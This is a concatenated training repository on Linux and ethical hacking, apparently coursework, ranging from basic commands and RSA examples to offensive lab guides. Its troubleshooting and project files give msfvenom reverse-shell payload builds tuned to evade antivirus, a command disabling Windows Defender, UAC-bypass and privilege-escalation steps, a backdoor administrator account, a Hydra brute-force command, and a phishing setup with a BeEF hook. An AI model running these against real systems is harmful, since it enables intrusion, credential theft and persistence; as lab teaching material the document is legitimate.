├── shell_week ├── weekly_task.md ├── shell_log_rotation_recoder.md ├── shell.md ├── weekly_audit_report.md └── os_hardening_bash.md ├── projects ├── nmap_post.md ├── potential_issues.md ├── permission_task.md ├── post_exploitation_5.md ├── logs_files.md ├── phishing-task.md ├── new_linux_task.md ├── post-exploitation-research.md ├── fiver_siem_guide.md ├── sniffing-network.md ├── permission-ownership.md ├── vnc_task.md ├── stegganography.md ├── mimikaz_projects.md ├── steghide-task.md ├── steghide-guide.md ├── new2_task.md ├── post_exploitation_4.md ├── challenge-3.md ├── new_johntherepper.md ├── post-exploitation.md ├── Post-exploitation-task.md ├── exploiting_sql_injection.md ├── metasploit_network_cap.md ├── auto_qlinjection.md ├── dvwa_low.md ├── network_analysis.md └── malware.md ├── week1 ├── day2_basics.md ├── day3_mv.md ├── key_enc_dec.md ├── day_1.md ├── day4_delete.md ├── keypair.md ├── manually_calculate_hash_value.md ├── day5_FHS.md ├── crypto_project.md └── cryptgraphic.md ├── README.md ├── nmap-task.md ├── troubleshooting ├── meterpreter-error.md ├── admin-permission.md └── windows-payloads.md ├── network-sniffing.md ├── week3 ├── command_help.md ├── env_variable.md ├── path_shell.md ├── redirect_shell.md ├── shell_basics.md ├── super_user.md └── day2_report.md ├── week2 ├── day6_ip_roting.md ├── day5_dhcp.md ├── day7_dns.md ├── day1_networking.md ├── day4_ethernet_arp.md ├── day3_subnetting.md ├── day2_tcp.md ├── day9_ssh.md ├── day8_netlify.md └── day10_file_transfer.md └── Ransomware-Project(groupC).md /shell_week/weekly_task.md: -------------------------------------------------------------------------------- 1 | ### Weekly Audit Report Generator 2 | #### Goal: Run scheduled scans and save logs to /var/log/security-audit.log 3 | 4 | ##### Tasks: 5 | 6 | * Check open ports (ss, netstat, nmap) 7 | * Users with UID 0 8 | * SUID/SGID files 9 | * Print summary report 10 | -------------------------------------------------------------------------------- /projects/nmap_post.md: -------------------------------------------------------------------------------- 1 | ## Practical: Installing a Service & Detecting It with Nmap 2 | 3 | ### Step 1 — Install an SMTP Service on Linux 4 | 5 | ### Step 2 - Verify the service is running 6 | 7 | ### Step 3 - Detect the SMTP Service is running with nmap 8 | 9 | ### Step 4 — Service Version Detection 10 | 11 | ##### Reference: 12 | - Command to install the service 13 | - Command to update kali 14 | - nmap command 15 | -------------------------------------------------------------------------------- /week1/day2_basics.md: -------------------------------------------------------------------------------- 1 | ## Linux Navigation Basics: Basic Commands 2 | 3 | Linux Navigation Basics is about using simple commands to move around and manage files on your computer. 4 | For example, cd lets you go into different folders, ls shows you what files and folders are inside, and pwd tells you where you are 5 | currently. These commands help you easily find and organize your files. 6 | 7 | # Change directory 8 | ```bash 9 | cd /path/to/directory 10 | ``` 11 | 12 | # Lists files and directories in the current directory. 13 | ```bash 14 | ls 15 | ``` 16 | 17 | # View current working directory 18 | ```bash 19 | pwd 20 | ``` 21 | # Displays the mannual page for a command 22 | ```bash 23 | man ls 24 | ``` 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | # Everything Linux 4 | 5 | Welcome to **Everything Linux** – your go-to repository for learning, mastering, and exploring all things Linux! This repository is dedicated to providing a comprehensive collection of resources, tutorials, and tips for anyone working with Linux, whether you're a beginner or an advanced user. 6 | 7 | ### What’s Inside: 8 | 9 | - **Basic Commands**: A collection of essential Linux commands and how to use them. 10 | - **File System Hierarchy**: Understanding the structure of the Linux file system. 11 | - **Scripting and Automation**: Bash scripts, tips, and tricks to automate tasks. 12 | - **Linux Tools**: Guide to useful Linux utilities and software. 13 | - **System Administration**: Tutorials for managing and configuring Linux systems. 14 | - **Security and Networking**: Resources for securing your Linux environment and network configuration. 15 | 16 | ### Contribute: 17 | Feel free to open issues, submit pull requests, and share your own experiences and insights! Let’s make this the ultimate Linux resource for everyone. 18 | 19 | ### Author: Ephraim C. Norbert 20 | 21 | --- 22 | 23 | -------------------------------------------------------------------------------- /shell_week/shell_log_rotation_recoder.md: -------------------------------------------------------------------------------- 1 | ### **Difference Between Log Rotation and Recorder** 2 | 3 | | Feature | **Log Rotation** | **Recorder** | 4 | |---------------|----------------|-------------| 5 | | **Purpose** | Manages and organizes log files | Continuously records data (logs, audio, video, etc.) | 6 | | **Functionality** | Moves old logs, renames them, and deletes old files | Captures and stores data for future use | 7 | | **Trigger Mechanism** | Happens based on file size, time, or manual execution | Runs continuously or on demand | 8 | | **Output** | Archived log files with timestamps | A live or stored record of events | 9 | | **Use Case** | Prevents logs from growing too large and consuming disk space | Keeps a record of events for monitoring or analysis | 10 | | **Example** | `logrotate` in Linux, moving logs to an archive folder | A security camera recording video or a script logging network activity | 11 | 12 | --- 13 | 14 | ### **How They Work in Your Case** 15 | - **Log Rotation:** In your Bash script, logs are moved to an archive and cleaned up after 30 days. This prevents unlimited log growth. 16 | - **Recorder:** Your script is also **recording** log entries from a named pipe (`PIPENAME`) and writing them to a log file. 17 | 18 | In short: 19 | - **A script acts as a recorder** because it continuously writes logs. 20 | - **The log rotation function manages recorded logs** to keep storage clean. 21 | -------------------------------------------------------------------------------- /nmap-task.md: -------------------------------------------------------------------------------- 1 | ## **Project: Network Scanning and Vulnerability Detection with Nmap** 2 | 3 | ### **Objective**: 4 | Use `nmap` to perform reconnaissance and vulnerability scanning on a vulnerable machine (Metasploitable2). 5 | 6 | ### **Lab Setup**: 7 | - **Target**: Metasploitable2, Download it first(VM on VirtualBox/VMware) 8 | - **Attacker**: Kali Linux or Parrot OS (VM or physical machine) 9 | - **Network**: Host-only Adapter or NAT Network (to isolate traffic from the real internet) 10 | 11 | ### **Tasks & Steps**: 12 | 13 | ### **1. Host Discovery** 14 | > Use `nmap` to discover the target’s IP address. 15 | 16 | ```bash 17 | nmap -sn 192.168.56.0/24 18 | ``` 19 | 20 | ### **2. Basic Port Scan** 21 | > Discover open ports and services. 22 | 23 | ```bash 24 | nmap -sS -Pn -v 192.168.56.X 25 | ``` 26 | 27 | ### **3. Service and Version Detection** 28 | 29 | ```bash 30 | nmap -sV 192.168.56.X 31 | ``` 32 | 33 | 34 | ### **4. OS Detection** 35 | 36 | ```bash 37 | nmap -O 192.168.56.X 38 | ``` 39 | 40 | ### **5. Aggressive Scan (All-in-One)** 41 | 42 | ```bash 43 | nmap -A 192.168.56.X 44 | ``` 45 | 46 | ### **6. Vulnerability Script Scan** 47 | > Use built-in `nmap` NSE scripts to find known vulnerabilities. 48 | 49 | ```bash 50 | nmap --script vuln 192.168.56.X 51 | ``` 52 | 53 | - MS08-067 54 | - Anonymous FTP access 55 | - Open Samba shares 56 | - Shellshock or Heartbleed* 57 | 58 | ### **7. Output to File (for reports)** 59 | 60 | ```bash 61 | nmap -A -oN scan_results.txt 192.168.56.X 62 | ``` 63 | -------------------------------------------------------------------------------- /projects/potential_issues.md: -------------------------------------------------------------------------------- 1 | ### **Potential Issues & Fixes** 2 | 3 | #### **1. Check the target URL path** 4 | - The test site `testphp.vulnweb.com` requires an actual login path. 5 | - Try `"/login.php:username=^USER^&password=^PASS^:Invalid username or password"` instead of just `"/"`. 6 | 7 | #### **2. Verify the failure message** 8 | - The failure message you provided (`"Invalid username or password"`) must match exactly what the website returns when login fails. 9 | - Use **Burp Suite** or **Developer Tools (F12 → Network → Response)** to check the actual error message. 10 | 11 | #### **3. Check if the site blocks brute-force attempts** 12 | - Some websites have rate-limiting or CAPTCHA after multiple failed logins. 13 | - You may need to adjust the request timing using `-t 1` (one request at a time) or use `-f` to stop on the first valid login. 14 | 15 | #### **4. Ensure Hydra is installed properly** 16 | Run: 17 | ```bash 18 | hydra -h 19 | ``` 20 | If Hydra isn’t installed, install it using: 21 | ```bash 22 | sudo apt install hydra -y # For Debian-based systems 23 | ``` 24 | 25 | #### **5. Correct the output file path** 26 | - The output directory must exist before running the command. Run: 27 | ```bash 28 | mkdir -p ~/project 29 | ``` 30 | 31 | --- 32 | 33 | ### **Fixed Hydra Command:** 34 | ```bash 35 | hydra -L ~/project/usernames.txt -P ~/project/500-worst-passwords.txt testphp.vulnweb.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password" -o ~/project/hydra_results.txt -t 1 36 | ``` 37 | 38 | ### **Optional Enhancements:** 39 | - If the login form has additional hidden fields (like a CSRF token), you'll need to extract them dynamically. 40 | - Add `-V` for verbose output to debug what’s happening. 41 | -------------------------------------------------------------------------------- /projects/permission_task.md: -------------------------------------------------------------------------------- 1 | ### 📝 **Task: File Permission Mastery** 2 | 3 | **Objective:** Learn how to manage and apply file permissions using `chmod`. 4 | 5 | #### Setup: 6 | 7 | 1. Open your terminal. 8 | 2. Create a new directory called `permissions_lab`. 9 | 3. Inside it, create three files: `script.sh`, `report.txt`, and `data.db`. 10 | 11 | ```bash 12 | mkdir permissions_lab 13 | cd permissions_lab 14 | touch script.sh report.txt data.db 15 | ``` 16 | 17 | #### Task Instructions: 18 | 19 | 1. **Initial Permissions Check:** 20 | 21 | * Use `ls -l` to list the permissions of all files. 22 | * Write down or screenshot the output. 23 | 24 | 2. **Assign Permissions:** 25 | 26 | * Give full permissions (read, write, execute) to all users for `script.sh` using **numeric mode**. 27 | * Give read and write permissions to the **owner**, read-only to the **group**, and no permissions to **others** for `report.txt` using **symbolic mode**. 28 | * Remove all permissions from `data.db`. 29 | 30 | 3. **Commands to Use:** 31 | 32 | * `chmod 777 script.sh` 33 | * `chmod u=rw,g=r,o= report.txt` 34 | * `chmod 000 data.db` 35 | 36 | 4. **Verification:** 37 | 38 | * Run `ls -l` again to confirm the permission changes. 39 | * Note any differences and explain what each set of permissions means. 40 | 41 | 5. **Bonus (Challenge):** 42 | 43 | * Create a subdirectory `testdir` inside `permissions_lab`. 44 | * Set full permissions to `testdir` **recursively** (for the folder and its content). 45 | * Command hint: `chmod -R 777 testdir` 46 | 47 | 48 | ### Questions: 49 | 50 | 1. What does the number 7 represent in `chmod 777`? 51 | 2. Why is it dangerous to give full permissions to all users on a script? 52 | 3. What happens when you try to open `data.db` after removing all permissions? 53 | -------------------------------------------------------------------------------- /projects/post_exploitation_5.md: -------------------------------------------------------------------------------- 1 | ## **Lab Assignment: Exploiting MS08-067 with Metasploit** 2 | 3 | ### **Objective** 4 | Use Metasploit to exploit the **MS08-067 NetAPI vulnerability** on a vulnerable Windows 7 machine and gain a Meterpreter shell. 5 | 6 | 7 | 8 | ### **Steps** 9 | 10 | **1. Lab Setup** 11 | 12 | * Ensure you have: 13 | 14 | * **Kali Linux (attacker machine)** with `msfconsole` installed. 15 | * **Windows 7 vulnerable VM** (unpatched, with vulnerable `netapi32.dll`). 16 | * Use **Host-Only Network** or **NAT Network** in VirtualBox/VMware for isolation. 17 | * Confirm attacker and victim VMs are on the same network (`ifconfig` / `ipconfig`). 18 | 19 | 20 | 21 | **2. Verify the Target is Alive** 22 | On Kali, run: 23 | 24 | 25 | 26 | 27 | **3. Scan the Target with Nmap** 28 | Check if SMB (port 445) is open: 29 | 30 | 31 | 32 | If port **445/tcp open** → the target is vulnerable to SMB exploits. 33 | 34 | 35 | 36 | **4. Start Metasploit** 37 | 38 | 39 | 40 | 41 | **5. Load the Exploit Module** 42 | 43 | ```bash 44 | ms08_067_netapi 45 | ``` 46 | 47 | 48 | **6. Configure the Target (Victim)** 49 | 50 | 51 | 52 | 53 | 54 | **7. Configure the Payload** 55 | Choose a reverse shell payload: 56 | 57 | 58 | 59 | 60 | **8. Launch the Exploit** 61 | 62 | ```bash 63 | exploit 64 | ``` 65 | 66 | If successful, you’ll get a **Meterpreter session**. 67 | 68 | 69 | **9. Post-Exploitation Activities** 70 | Inside the Meterpreter shell, try: 71 | 72 | ```bash 73 | sysinfo # Check system details 74 | getuid # Get current user 75 | hashdump # Dump password hashes (if allowed) 76 | screenshot # Take a screenshot of the victim’s desktop 77 | ``` 78 | 79 | 80 | **10. Reporting Requirement** 81 | Each student should submit a short **lab report** containing: 82 | 83 | * Screenshot of **Nmap scan results** (port 445 open). 84 | * Screenshot of **msfconsole running the exploit**. 85 | * Screenshot of **Meterpreter session** (`sysinfo` or `getuid`). 86 | * A reflection: *“Why was MS08-067 such a critical vulnerability?”* 87 | 88 | -------------------------------------------------------------------------------- /troubleshooting/meterpreter-error.md: -------------------------------------------------------------------------------- 1 | If your Meterpreter session keeps closing after execution, there are several potential reasons and fixes you can try: 2 | 3 | ### 1. **Check if the Payload is Being Blocked** 4 | - **Windows Defender/Antivirus:** Modern Windows security features detect and kill Meterpreter payloads quickly. 5 | **Fix:** Disable Defender or add exclusions: 6 | ``` 7 | powershell -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true" 8 | ``` 9 | - **Firewall:** Ensure Windows Firewall is not blocking the connection. 10 | 11 | ### 2. **Try a Different Payload Encoding** 12 | - `shikata_ga_nai` is often flagged by AV. Try adding more layers of encoding: 13 | ``` 14 | msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -i 5 -b "\x00" LHOST=10.0.2.42 -f exe > Desktop/Exploit.exe 15 | ``` 16 | Increase the iterations (`-i 5`) to make it harder to detect. 17 | 18 | ### 3. **Use a Staged Payload** 19 | If the payload is crashing immediately, try using a staged payload (`windows/meterpreter/reverse_tcp`) instead of a stageless one (`windows/meterpreter_reverse_tcp`): 20 | ``` 21 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.42 LPORT=4444 -f exe > Exploit.exe 22 | ``` 23 | 24 | ### 4. **Use an Alternative Listener Configuration** 25 | Set up your Metasploit listener with: 26 | ``` 27 | use exploit/multi/handler 28 | set payload windows/meterpreter/reverse_tcp 29 | set LHOST 10.0.2.42 30 | set LPORT 4444 31 | set ExitOnSession false 32 | exploit -j 33 | ``` 34 | 35 | ### 5. **Run Payload in Compatibility Mode** 36 | On the target machine, try running `Exploit.exe` in **compatibility mode (Windows 7)** and with **admin privileges**. 37 | 38 | ### 6. **Check for Session Timeouts** 39 | - Ensure your `session-timed-out` value isn't too low: 40 | ``` 41 | set AutoRunScript post/windows/manage/migrate 42 | ``` 43 | 44 | ### 7. **Use a Different Payload Format** 45 | Instead of `.exe`, try encoding into a different format, like PowerShell or DLL: 46 | ``` 47 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.42 LPORT=4444 -f psh-cmd > exploit.ps1 48 | ``` 49 | -------------------------------------------------------------------------------- /network-sniffing.md: -------------------------------------------------------------------------------- 1 | # Webdeves Ethical Hacking Final Project (Team Red) 2 | 3 | ## **Project Title: Packet Sniffer & Analyzer** 4 | 5 | ### **Objective**: 6 | Build a Python-based **packet sniffer** that captures, analyzes, and logs network traffic to help identify suspicious activity and learn how attackers spy on or manipulate data in transit. 7 | 8 | ### **Core Features**: 9 | 10 | 1. **Packet Capture**: 11 | - Use `scapy` or `pyshark` to sniff packets in real time. 12 | - Capture Ethernet, ARP, IP, TCP, UDP, and HTTP traffic. 13 | 14 | 2. **Protocol Analyzer**: 15 | - Parse and print packet details (source, destination, protocol, payload). 16 | - Detect unencrypted credentials (like HTTP Basic Auth). 17 | - Highlight common reconnaissance activity (e.g., ping sweeps, port scans). 18 | 19 | 3. **Suspicious Activity Detection**: 20 | - Flag: 21 | - DNS Tunneling 22 | - ARP Spoofing 23 | - Port scanning attempts 24 | - MITM indicators 25 | 26 | 4. **Logging & Exporting**: 27 | - Save captured traffic to `.pcap` or `.csv`. 28 | - Allow filtering by protocol or IP. 29 | - Timestamped logs for forensic replay. 30 | 31 | 5. **Bonus Features (Advanced)**: 32 | - Live dashboard with graphs (Flask + Chart.js). 33 | - PCAP file upload and offline analysis. 34 | - Alert system for detected anomalies. 35 | 36 | ### **Tools & Libraries**: 37 | - `scapy` – low-level packet crafting/sniffing 38 | - `pyshark` – wrapper around tshark for deep packet parsing 39 | - `socket` – IP-level network interactions 40 | - `pandas` – traffic log analysis 41 | - `matplotlib` or `Plotly` – for visualizations 42 | 43 | 44 | ### **Setup Instructions**: 45 | - Run in a **controlled lab network** (e.g., Kali + Metasploitable or DVWA). 46 | - Capture only local subnet traffic. 47 | - Teach how to filter with `Wireshark` and compare with the tool’s output. 48 | 49 | 50 | ### **Deliverables**: 51 | - Fully documented Python source 52 | - Interface or CLI for capturing and analyzing 53 | - Exportable PCAP/CVS logs 54 | - Sample attack detection outputs 55 | - Report explaining packet structure and threats 56 | 57 | ### **Real-World Impact**: 58 | - Deep understanding of **network layers and protocols** 59 | - Foundation for IDS/IPS systems 60 | - Insight into how **hackers and defenders use packet sniffing** 61 | - Creates a springboard for projects like: 62 | - Intrusion detection systems 63 | - MITM simulators 64 | - Network forensics tools 65 | -------------------------------------------------------------------------------- /week1/day3_mv.md: -------------------------------------------------------------------------------- 1 | ### Moving Files in Linux 2 | 3 | The **`mv`** command is one of the most frequently used commands in Linux. It allows you to: 4 | 5 | 1. **Move files or directories** from one location to another. 6 | 2. **Rename files or directories** by moving them to the same location with a new name. 7 | 8 | --- 9 | 10 | ### **Syntax** 11 | ```bash 12 | mv [options] source destination 13 | ``` 14 | - **`source`**: The file or directory you want to move. 15 | - **`destination`**: The target location or new name for the file/directory. 16 | 17 | --- 18 | 19 | ### **Examples** 20 | 21 | #### 1. **Moving Files** 22 | Move a file to a different directory. 23 | ```bash 24 | mv file1.txt /home/user/Documents/ 25 | ``` 26 | After running this, `file1.txt` will now be located in the `/home/user/Documents` directory. 27 | 28 | #### 2. **Renaming Files** 29 | Rename a file by "moving" it to the same location with a new name. 30 | ```bash 31 | mv oldname.txt newname.txt 32 | ``` 33 | This renames `oldname.txt` to `newname.txt`. 34 | 35 | #### 3. **Moving Directories** 36 | Move an entire directory and its contents. 37 | ```bash 38 | mv /home/user/old_folder /home/user/new_folder 39 | ``` 40 | 41 | #### 4. **Overwrite Confirmation** 42 | By default, the `mv` command overwrites files without asking. To get a confirmation prompt before overwriting: 43 | ```bash 44 | mv -i file1.txt /home/user/Documents/ 45 | ``` 46 | 47 | #### 5. **Move Multiple Files** 48 | You can move multiple files to a directory in one command. 49 | ```bash 50 | mv file1.txt file2.txt /home/user/Documents/ 51 | ``` 52 | 53 | --- 54 | 55 | ### **Options** 56 | - **`-i` (interactive):** Prompts you before overwriting an existing file. 57 | ```bash 58 | mv -i file1.txt /home/user/Documents/ 59 | ``` 60 | - **`-n` (no-clobber):** Prevents overwriting existing files. 61 | ```bash 62 | mv -n file1.txt /home/user/Documents/ 63 | ``` 64 | - **`-v` (verbose):** Displays details about what is being moved. 65 | ```bash 66 | mv -v file1.txt /home/user/Documents/ 67 | ``` 68 | 69 | --- 70 | 71 | ### **Tips** 72 | - Always double-check the source and destination paths to avoid accidentally overwriting or misplacing files. 73 | - Combine with `ls` to verify files in the target directory after moving: 74 | ```bash 75 | ls /home/user/Documents/ 76 | ``` 77 | 78 | --- 79 | 80 | By mastering the `mv` command, you can efficiently organize, relocate, and rename files or directories, making it a vital tool in your Linux workflow! 81 | -------------------------------------------------------------------------------- /projects/logs_files.md: -------------------------------------------------------------------------------- 1 | In **Kali Linux**, log files are primarily stored in the `/var/log/` directory. These logs contain system messages, authentication attempts, package installations, and other critical system events. 2 | 3 | ### **Common Log File Locations in Kali Linux** 4 | 1. **System Logs** 5 | - `/var/log/syslog` → General system logs, including startup and shutdown messages. 6 | - `/var/log/dmesg` → Kernel ring buffer messages (useful for hardware diagnostics). 7 | - `/var/log/kern.log` → Kernel-specific logs. 8 | 9 | 2. **Authentication & Security Logs** 10 | - `/var/log/auth.log` → Authentication attempts (SSH logins, sudo usage). 11 | - `/var/log/faillog` → Failed login attempts. 12 | - `/var/log/wtmp` → Record of logins, reboots, and shutdowns. 13 | - `/var/log/btmp` → Failed login attempts (binary format, view using `lastb`). 14 | 15 | 3. **Package Management Logs** 16 | - `/var/log/dpkg.log` → Package installation, upgrade, and removal logs (for Debian-based systems like Kali). 17 | - `/var/log/apt/` → Contains logs related to package installations via APT. 18 | 19 | 4. **Networking & Firewall Logs** 20 | - `/var/log/ufw.log` → UFW (Uncomplicated Firewall) logs. 21 | - `/var/log/nginx/` → Logs for the **NGINX** web server. 22 | - `/var/log/apache2/` → Logs for the **Apache** web server. 23 | - `/var/log/samba/` → Samba (SMB) logs. 24 | 25 | 5. **Cron Jobs & Scheduled Tasks** 26 | - `/var/log/cron.log` or `/var/log/syslog` → Cron job execution logs. 27 | 28 | 6. **Xorg (GUI Display Server) Logs** 29 | - `/var/log/Xorg.0.log` → Logs related to the X Window system. 30 | 31 | --- 32 | 33 | ### **How Log Files are Saved** 34 | - **Plain Text Format**: Most logs are stored in **plain text** (e.g., `/var/log/syslog`). 35 | - **Binary Format**: Some logs, like `/var/log/wtmp` and `/var/log/btmp`, are stored in **binary** format and must be read using commands like: 36 | ```bash 37 | last -f /var/log/wtmp 38 | lastb -f /var/log/btmp 39 | ``` 40 | - **Rotated Logs**: 41 | Logs are **rotated** periodically to prevent excessive disk usage. Log rotation is managed by: 42 | - `logrotate` (configured in `/etc/logrotate.conf` and `/etc/logrotate.d/`). 43 | - Older logs are compressed (`.gz`) and stored with timestamps. 44 | 45 | --- 46 | 47 | ### **Commands to View Log Files** 48 | - **Tail (Live Logs)** 49 | ```bash 50 | tail -f /var/log/syslog 51 | ``` 52 | - **Grep (Search for Specific Entries)** 53 | ```bash 54 | grep "error" /var/log/syslog 55 | ``` 56 | - **Journalctl (For Systemd Logs)** 57 | ```bash 58 | journalctl -xe 59 | ``` 60 | -------------------------------------------------------------------------------- /troubleshooting/admin-permission.md: -------------------------------------------------------------------------------- 1 | **Administrator permission error** because the Meterpreter session is running with **regular user privileges**, meaning you don't have the necessary rights to create a new user or elevate privileges. You need to **escalate privileges** first. Here are some ways to do that: 2 | 3 | --- 4 | 5 | ## **1. Check Current Privileges** 6 | First, check if you are running as **SYSTEM or Administrator** in Meterpreter: 7 | ``` 8 | getuid 9 | ``` 10 | If it returns a standard user (not SYSTEM or Administrator), you need to escalate. 11 | 12 | --- 13 | 14 | ## **2. Try Automatic Privilege Escalation** 15 | Run: 16 | ``` 17 | use post/windows/escalate/getsystem 18 | run 19 | ``` 20 | If successful, it should elevate you to **NT AUTHORITY\SYSTEM**. 21 | 22 | --- 23 | 24 | ## **3. Migrate to a High-Privilege Process** 25 | If `getsystem` fails, try migrating into a process with **higher privileges**: 26 | 1. List running processes: 27 | ``` 28 | ps 29 | ``` 30 | 2. Find a process owned by **NT AUTHORITY\SYSTEM** (e.g., `winlogon.exe` or `lsass.exe`). 31 | 3. Migrate into it: 32 | ``` 33 | migrate 34 | ``` 35 | Example: 36 | ``` 37 | migrate 1234 38 | ``` 39 | 4. Check if you now have SYSTEM privileges: 40 | ``` 41 | getuid 42 | ``` 43 | 44 | --- 45 | 46 | ## **4. Manually Exploit Privilege Escalation** 47 | If the above methods don’t work, use a **local privilege escalation exploit**. 48 | Try running: 49 | ``` 50 | use exploit/windows/local/bypassuac 51 | set payload windows/meterpreter/reverse_tcp 52 | set SESSION 1 53 | exploit 54 | ``` 55 | If that doesn't work, search for other local privilege escalation exploits: 56 | ``` 57 | search type:exploit platform:windows local 58 | ``` 59 | Pick one that fits your OS and run it. 60 | 61 | --- 62 | 63 | ## **5. Try Running a UAC Bypass** 64 | If you have admin privileges but **UAC (User Account Control) is blocking** the command, try: 65 | ``` 66 | use exploit/windows/local/bypassuac_fodhelper 67 | set SESSION 1 68 | exploit 69 | ``` 70 | This works by abusing `fodhelper.exe` to bypass UAC. 71 | 72 | --- 73 | 74 | ## **6. Run Commands as SYSTEM** 75 | If you get SYSTEM privileges, you can execute system commands directly: 76 | ``` 77 | execute -f cmd.exe -i -H 78 | ``` 79 | Then, try: 80 | ``` 81 | net user hacker P@ssw0rd /add 82 | net localgroup administrators hacker /add 83 | ``` 84 | - If `getsystem` or `bypassuac` fails, the system might be patched. Try finding an **exploit for your OS version**. 85 | - Use `sysinfo` to check the Windows version, then search for privilege escalation exploits. 86 | - If UAC is enabled and blocking commands, bypass it using `bypassuac_fodhelper` or another method. 87 | -------------------------------------------------------------------------------- /projects/phishing-task.md: -------------------------------------------------------------------------------- 1 | ## Final Project: Human Weakness Exploitation via BeEF & GoPhish 2 | **Theme**: *Simulating Phishing and Post-Click Exploitation* 3 | 4 | ### **Objectives** 5 | 6 | - Design a targeted phishing campaign. 7 | - Capture clicks and interaction data via GoPhish. 8 | - Use BeEF to hook a browser and demonstrate what an attacker could do post-click. 9 | - Create a report + awareness material explaining the attack and how to prevent it. 10 | 11 | --- 12 | 13 | ### **Project Steps** 14 | 15 | #### 1. Set Up Lab Environment 16 | - Kali Linux with: 17 | - BeEF installed (`/usr/share/beef-xss`) 18 | - GoPhish (download from [https://github.com/gophish/gophish](https://github.com/gophish/gophish)) 19 | - Optional: Metasploitable VM or any sandboxed target for realism 20 | - Ensure all testing is done in a **contained environment with full consent**. 21 | 22 | --- 23 | 24 | #### 2. GoPhish Campaign Setup 25 | - Create a **phishing email** with: 26 | - A believable message (e.g., "Important Update Required") 27 | - A link to a fake login page or document portal 28 | 29 | - Landing page should include the **BeEF hook**: 30 | ```html 31 | 32 | ``` 33 | 34 | - Start GoPhish, configure your SMTP settings, and launch the campaign. 35 | 36 | 37 | #### 3. BeEF Exploitation Phase 38 | - Once the user lands on the page, BeEF will show a **hooked browser**. 39 | - Demonstrate basic post-exploitation: 40 | - Alert box 41 | - Browser fingerprinting 42 | - Fake login prompt 43 | - Webcam prompt (but **do not use** it unless it's your own machine) 44 | 45 | #### 4. Metrics to Collect 46 | - Emails sent / opened 47 | - Links clicked 48 | - Hooked sessions in BeEF 49 | - Commands successfully run in BeEF 50 | - Time-to-click stats 51 | 52 | #### 5. Awareness & Defense Material 53 | Explain: 54 | - How this attack works 55 | - Red flags to watch for 56 | - Technical and non-technical defenses (e.g., email filtering, user training, browser hardening) 57 | 58 | 59 | #### 6. Final Report 60 | - Executive Summary 61 | - Attack Simulation Details 62 | - Ethical Boundaries Maintained 63 | - GoPhish Campaign Overview 64 | - BeEF Post-Click Actions 65 | - Defense Recommendations 66 | 67 | ### Ethics & Rules 68 | - No phishing real users without explicit consent 69 | - No persistence, malware, or real data exfiltration 70 | - All email recipients must be part of the exercise and aware of the simulation either before or immediately after 71 | - Hooked browsers must be student-owned or lab machines 72 | 73 | 74 | - Integrate a **custom payload** in BeEF 75 | - Bypass a basic email filter or browser security warning (safely) 76 | - Create a **mock SOC alert** based on the campaign 77 | -------------------------------------------------------------------------------- /week1/key_enc_dec.md: -------------------------------------------------------------------------------- 1 | ### **🔹 Encrypting & Decrypting Data Using RSA Key Pair** 2 | Once you've generated your **private (`private_key.pem`)** and **public (`public_key.pem`)** keys, you can use them for **secure encryption and decryption**. 3 | 4 | --- 5 | 6 | ## **📌 Step 1: Create a Sample Message** 7 | First, create a file with some text to encrypt. 8 | ```bash 9 | echo "Hello, this is a secret message!" > message.txt 10 | ``` 11 | 12 | --- 13 | 14 | ## **📌 Step 2: Encrypt the Message Using the Public Key** 15 | We use the **public key** to encrypt the file. 16 | ```bash 17 | openssl rsautl -encrypt -pubin -inkey public_key.pem -in message.txt -out encrypted_message.bin 18 | ``` 19 | ✅ **Now, `encrypted_message.bin` contains the encrypted message.** 20 | 21 | 🔴 **Why use the public key?** 22 | - Anyone can encrypt messages using the **public key**. 23 | - Only the owner of the **private key** can decrypt them. 24 | 25 | --- 26 | 27 | ## **📌 Step 3: Decrypt the Message Using the Private Key** 28 | Now, decrypt the file using the **private key**. 29 | ```bash 30 | openssl rsautl -decrypt -inkey private_key.pem -in encrypted_message.bin -out decrypted_message.txt 31 | ``` 32 | ✅ **Check the decrypted message:** 33 | ```bash 34 | cat decrypted_message.txt 35 | ``` 36 | Expected output: 37 | ``` 38 | Hello, this is a secret message! 39 | ``` 40 | 41 | --- 42 | 43 | ## **📌 Step 4: Digitally Sign a File** 44 | A **digital signature** proves that a message came from a trusted source and wasn’t altered. 45 | 46 | ### **Sign the message with the private key** 47 | ```bash 48 | openssl dgst -sha256 -sign private_key.pem -out message.sig message.txt 49 | ``` 50 | ✅ **Now, `message.sig` contains the digital signature.** 51 | 52 | --- 53 | 54 | ## **📌 Step 5: Verify the Signature Using the Public Key** 55 | To verify the signature, the recipient uses your **public key**: 56 | ```bash 57 | openssl dgst -sha256 -verify public_key.pem -signature message.sig message.txt 58 | ``` 59 | If valid, OpenSSL will return: 60 | ``` 61 | Verified OK 62 | ``` 63 | 64 | --- 65 | 66 | ## **📌 Summary of Commands** 67 | | **Action** | **Command** | 68 | |------------|------------| 69 | | Encrypt a message | `openssl rsautl -encrypt -pubin -inkey public_key.pem -in message.txt -out encrypted_message.bin` | 70 | | Decrypt a message | `openssl rsautl -decrypt -inkey private_key.pem -in encrypted_message.bin -out decrypted_message.txt` | 71 | | Sign a message | `openssl dgst -sha256 -sign private_key.pem -out message.sig message.txt` | 72 | | Verify a signature | `openssl dgst -sha256 -verify public_key.pem -signature message.sig message.txt` | 73 | 74 | --- 75 | 76 | ### **📌 Real-World Applications** 77 | - **🔐 Secure file sharing** (encrypt data before sending it). 78 | - **📧 Email encryption (PGP-like security)**. 79 | - **🛡️ Digital signatures for verifying software updates**. 80 | -------------------------------------------------------------------------------- /projects/new_linux_task.md: -------------------------------------------------------------------------------- 1 | ## **Beginner Tasks** 2 | 1. **Navigation & File Management** 3 | - Create a directory called `my_project` inside the home folder. 4 | - Inside `my_project`, create three text files: `file1.txt`, `file2.txt`, and `file3.txt`. 5 | - Write "Hello World" into `file1.txt` using the `echo` command. 6 | - Copy `file1.txt` to `file1_backup.txt`. 7 | - Move `file2.txt` to a new directory called `backup`. 8 | 9 | 2. **File Permissions & Ownership** 10 | - Change permissions of `file1.txt` to **read & write for the owner, read for others**. 11 | - Change the owner of `file1_backup.txt` to another user. 12 | - Set `file3.txt` to be **executable** for all users. 13 | 14 | 3. **Viewing and 